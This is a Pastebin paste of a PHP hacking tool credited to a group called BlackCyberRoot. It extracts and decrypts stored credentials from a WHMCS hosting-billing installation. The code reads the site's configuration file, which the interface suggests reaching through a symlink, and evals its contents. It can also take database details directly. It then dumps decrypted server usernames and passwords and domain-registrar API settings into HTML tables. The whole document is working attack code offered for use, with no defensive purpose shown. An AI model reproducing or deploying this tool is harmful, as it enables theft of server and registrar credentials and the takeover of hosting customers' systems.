Advertisement
SalimiII

WHMCS Decode Password

Nov 1st, 2014
406
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.99 KB | None | 0 0
  1. <?php
  2.  
  3. ###########################################
  4. # WHMCS Server Password decoder #
  5. # Coded By M4XS4L1M1 #
  6. #https://www.facebook.com/Cyb3rCrime.gov.my#
  7. # https://www.facebook.com/BCRTeamOfficial #
  8. # BlackCyberRoot #
  9. ###########################################
  10.  
  11.  
  12.  
  13. function decrypt ($string,$cc_encryption_hash)
  14. {
  15.  
  16. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  17. $hash_key = _hash ($key);
  18. $hash_length = strlen ($hash_key);
  19. $string = base64_decode ($string);
  20. $tmp_iv = substr ($string, 0, $hash_length);
  21. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  22. $iv = $out = '';
  23. $c = 0;
  24. while ($c < $hash_length)
  25. {
  26. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  27. ++$c;
  28. }
  29.  
  30. $key = $iv;
  31. $c = 0;
  32. while ($c < strlen ($string))
  33. {
  34. if (($c != 0 AND $c % $hash_length == 0))
  35. {
  36. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  37. }
  38.  
  39. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  40. ++$c;
  41. }
  42.  
  43. return $out;
  44. }
  45.  
  46.  
  47. function _hash ($string)
  48. {
  49. if (function_exists ('sha1'))
  50. {
  51. $hash = sha1 ($string);
  52. }
  53. else
  54. {
  55. $hash = md5 ($string);
  56. }
  57.  
  58. $out = '';
  59. $c = 0;
  60. while ($c < strlen ($hash))
  61. {
  62. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  63. $c += 2;
  64. }
  65.  
  66. return $out;
  67. }
  68.  
  69. if($_POST['form_action'] == 1 )
  70. {
  71. //include($file);
  72.  
  73. $file=($_POST['file']);
  74. $text=file_get_contents($file);
  75.  
  76. $text= str_replace("<?php", "", $text);
  77. $text= str_replace("<?", "", $text);
  78. $text= str_replace("?>", "", $text);
  79.  
  80. eval($text);
  81.  
  82. $link=mysql_connect($db_host,$db_username,$db_password) ;
  83. mysql_select_db($db_name,$link) ;
  84.  
  85. $query = mysql_query("SELECT * FROM tblservers");
  86.  
  87. while($v = mysql_fetch_array($query)) {
  88.  
  89. $ipaddress = $v['ipaddress'];
  90. $username = $v['username'];
  91. $type = $v['type'];
  92. $active = $v['active'];
  93. $hostname = $v['hostname'];
  94.  
  95. echo("<center><table border='1'>");
  96. $password = decrypt ($v['password'], $cc_encryption_hash);
  97. echo("<tr><td>Type</td><td>$type</td></tr>");
  98. echo("<tr><td>Active</td><td>$active</td></tr>");
  99. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  100. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  101. echo("<tr><td>Username</td><td>$username</td></tr>");
  102. echo("<tr><td>Password</td><td>$password</td></tr>");
  103.  
  104.  
  105. echo "</table><br><br></center>";
  106.  
  107. }
  108.  
  109. $link=mysql_connect($db_host,$db_username,$db_password) ;
  110. mysql_select_db($db_name,$link) ;
  111.  
  112. $query = mysql_query("SELECT * FROM tblregistrars");
  113. echo("<center>Domain Reseller <br><table border='1'>");
  114. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  115. while($v = mysql_fetch_array($query)) {
  116.  
  117. $registrar = $v['registrar'];
  118. $setting = $v['setting'];
  119. $value = decrypt ($v['value'], $cc_encryption_hash);
  120. if ($value=="") {
  121. $value=0;
  122. }
  123. $password = decrypt ($v['password'], $cc_encryption_hash);
  124. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  125.  
  126.  
  127.  
  128.  
  129.  
  130. }
  131. echo "</table><br><br></center>";
  132. }
  133.  
  134.  
  135.  
  136. if($_POST['form_action'] == 2 )
  137. {
  138. //include($file);
  139.  
  140. $db_host=($_POST['db_host']);
  141. $db_username=($_POST['db_username']);
  142. $db_password=($_POST['db_password']);
  143. $db_name=($_POST['db_name']);
  144. $cc_encryption_hash=($_POST['cc_encryption_hash']);
  145.  
  146.  
  147.  
  148.  
  149. $link=mysql_connect($db_host,$db_username,$db_password) ;
  150. mysql_select_db($db_name,$link) ;
  151.  
  152. $query = mysql_query("SELECT * FROM tblservers");
  153.  
  154. while($v = mysql_fetch_array($query)) {
  155.  
  156. $ipaddress = $v['ipaddress'];
  157. $username = $v['username'];
  158. $type = $v['type'];
  159. $active = $v['active'];
  160. $hostname = $v['hostname'];
  161.  
  162. echo("<center><table border='1'>");
  163. $password = decrypt ($v['password'], $cc_encryption_hash);
  164. echo("<tr><td>Type</td><td>$type</td></tr>");
  165. echo("<tr><td>Active</td><td>$active</td></tr>");
  166. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  167. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  168. echo("<tr><td>Username</td><td>$username</td></tr>");
  169. echo("<tr><td>Password</td><td>$password</td></tr>");
  170.  
  171.  
  172. echo "</table><br><br></center>";
  173.  
  174. }
  175.  
  176.  
  177. $link=mysql_connect($db_host,$db_username,$db_password) ;
  178. mysql_select_db($db_name,$link) ;
  179.  
  180. $query = mysql_query("SELECT * FROM tblregistrars");
  181. echo("<center>Domain Reseller <br><table border='1'>");
  182. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  183. while($v = mysql_fetch_array($query)) {
  184.  
  185. $registrar = $v['registrar'];
  186. $setting = $v['setting'];
  187. $value = decrypt ($v['value'], $cc_encryption_hash);
  188. if ($value=="") {
  189. $value=0;
  190. }
  191. $password = decrypt ($v['password'], $cc_encryption_hash);
  192. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  193.  
  194.  
  195.  
  196.  
  197.  
  198. }
  199. echo "</table><br><br></center>";
  200. }
  201.  
  202.  
  203.  
  204.  
  205. ?><title>WHMCS Password Decode - by BlackCyberRoot</title>
  206. <link rel="shortcut icon" href="http://zupimages.net/up/14/41/z02l.png" type="image/x-icon" />
  207. <body bgcolor="#000000">
  208. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  209. <style>
  210. body {
  211. font-family: 'Audiowide', serif;
  212. font-size: 30px;
  213.  
  214. }
  215. </style>
  216. <style>
  217.  
  218. BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; color: white;}
  219. textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
  220. input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
  221. </style>
  222. <center>
  223. <font color="#FFFF6FF" size='+3'>[ ~~ WHMCS Server Password decoder ~~ ]</font><br><br>
  224. <font color="#0066FF" size='+2'>Symlink to configuration.php of WHMCS</font><br>
  225. <FORM action="" method="post">
  226. <input type="hidden" name="form_action" value="1">
  227. <br>
  228. <input type="text" size="30" name="file" value="">
  229. <br>
  230. <INPUT class=submit type="submit" value="Submit" name="Submit">
  231. </FORM>
  232. <hr color="#00aeff">
  233.  
  234. <br>
  235. <font color="#0066FF" size='+2'>DB configuration of WHMCS</font><br>
  236. <FORM action="" method="post">
  237. <input type="hidden" name="form_action" value="2">
  238. <br>
  239. <table border=1>
  240.  
  241. <tr><td>db_host </td><td><input type="text" size="30" name="db_host" value="localhost"></td></tr>
  242. <tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
  243. <tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
  244. <tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""><td></tr>
  245. <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>
  246.  
  247. </table>
  248. <br>
  249. <INPUT class=submit type="submit" value="Submit" name="Submit">
  250. </FORM>
  251. <hr color="#00aeff">
  252. <center>
  253. <font color="#0066FF" size='+2'>Password decoder</font><br>
  254. <?
  255. if($_POST['form_action'] == 3 )
  256. {
  257.  
  258.  
  259.  
  260. $password=($_POST['password']);
  261.  
  262. $cc_encryption_hash=($_POST['cc_encryption_hash']);
  263.  
  264.  
  265. $password = decrypt ($password, $cc_encryption_hash);
  266.  
  267. echo("Password is ".$password);
  268.  
  269. }
  270. ?>
  271. <FORM action="" method="post">
  272. <input type="hidden" name="form_action" value="3">
  273. <br>
  274. <table border=1>
  275.  
  276. <tr><td>Password</td><td><input type="text" size="30" name="password" value=""></td></tr>
  277. <tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>
  278.  
  279. </table>
  280. <br>
  281. <INPUT class=submit type="submit" value="Submit" name="Submit">
  282. </FORM>
  283. <hr color="#00aeff">
  284.  
  285.  
  286. <center> <font color="#FFFF6FF" size='+1'> Coded By M4XS4L1M1 </font><br><br> <center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement